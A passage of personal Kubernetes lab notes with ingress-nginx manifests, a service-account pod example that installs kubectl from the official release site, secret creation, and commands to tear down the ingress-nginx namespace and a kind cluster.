        app.kubernetes.io/version: 1.7.1
      name: ingress-nginx-admission-create
    spec:
      containers:
      - args:
        - create
        - --host=ingress-nginx-controller-admission,ingress-nginx-controller-admission.$(POD_NAMESPACE).svc
        - --namespace=$(POD_NAMESPACE)
        - --secret-name=ingress-nginx-admission
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        image: registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0@sha256:a7943503b45d552785aa3b5e457f169a5661fb94d82b8a3373bcd9ebaf9aac80
        imagePullPolicy: IfNotPresent
        name: create
        securityContext:
          allowPrivilegeEscalation: false
      nodeSelector:
        kubernetes.io/os: linux
      restartPolicy: OnFailure
      securityContext:
        fsGroup: 2000
        runAsNonRoot: true
        runAsUser: 2000
      serviceAccountName: ingress-nginx-admission
---
apiVersion: batch/v1
kind: Job
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission-patch
  namespace: ingress-nginx
spec:
  template:
    metadata:
      labels:
        app.kubernetes.io/component: admission-webhook
        app.kubernetes.io/instance: ingress-nginx
        app.kubernetes.io/name: ingress-nginx
        app.kubernetes.io/part-of: ingress-nginx
        app.kubernetes.io/version: 1.7.1
      name: ingress-nginx-admission-patch
    spec:
      containers:
      - args:
        - patch
        - --webhook-name=ingress-nginx-admission
        - --namespace=$(POD_NAMESPACE)
        - --patch-mutating=false
        - --secret-name=ingress-nginx-admission
        - --patch-failure-policy=Fail
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        image: registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0@sha256:a7943503b45d552785aa3b5e457f169a5661fb94d82b8a3373bcd9ebaf9aac80
        imagePullPolicy: IfNotPresent
        name: patch
        securityContext:
          allowPrivilegeEscalation: false
      nodeSelector:
        kubernetes.io/os: linux
      restartPolicy: OnFailure
      securityContext:
        fsGroup: 2000
        runAsNonRoot: true
        runAsUser: 2000
      serviceAccountName: ingress-nginx-admission
---
apiVersion: networking.k8s.io/v1
kind: IngressClass
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: nginx
spec:
  controller: k8s.io/ingress-nginx
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
  namespace: ingress-nginx
spec:
  egress:
  - {}
  podSelector:
    matchLabels:
      app.kubernetes.io/component: admission-webhook
      app.kubernetes.io/instance: ingress-nginx
      app.kubernetes.io/name: ingress-nginx
  policyTypes:
  - Ingress
  - Egress
---
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
webhooks:
- admissionReviewVersions:
  - v1
  clientConfig:
    service:
      name: ingress-nginx-controller-admission
      namespace: ingress-nginx
      path: /networking/v1/ingresses
  failurePolicy: Fail
  matchPolicy: Equivalent
  name: validate.nginx.ingress.kubernetes.io
  rules:
  - apiGroups:
    - networking.k8s.io
    apiVersions:
    - v1
    operations:
    - CREATE
    - UPDATE
    resources:
    - ingresses
  sideEffects: None
```

reference: https://k8s-examples.containersolutions.com/examples/ServiceAccount/ServiceAccount.html

```yaml
- kind: ServiceAccount
  name: service-account-ingress-pod-access
  namespace: default
roleRef:
  kind: ClusterRole
  name: ingress-pod-access
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: service-account-ingress-pod-access
  namespace: default
---
apiVersion: v1
kind: Pod
metadata:
  name: service-account-pod
  namespace: default
spec:
  containers:
  - command: ["/bin/bash", "-c", "apt update && apt install -y curl vim && curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\" && chmod +x kubectl && mv kubectl /usr/local/bin && sleep 5000000"]
    image: ubuntu
    name: pods-simple-container
  serviceAccount: service-account-ingress-pod-access
```

reference: https://spacelift.io/blog/kubernetes-secrets

```shell
kubectl create secret generic database-credentials --from-file=username.txt --from-file=password.txt --namespace=kube-system
```

```shell
kubectl delete all --all -n ingress-nginx
```

reference: https://kind.sigs.k8s.io/docs/user/quick-start/#deleting-a-cluster

```shell
kind delete cluster
```

Author: Maximilian Kleinke
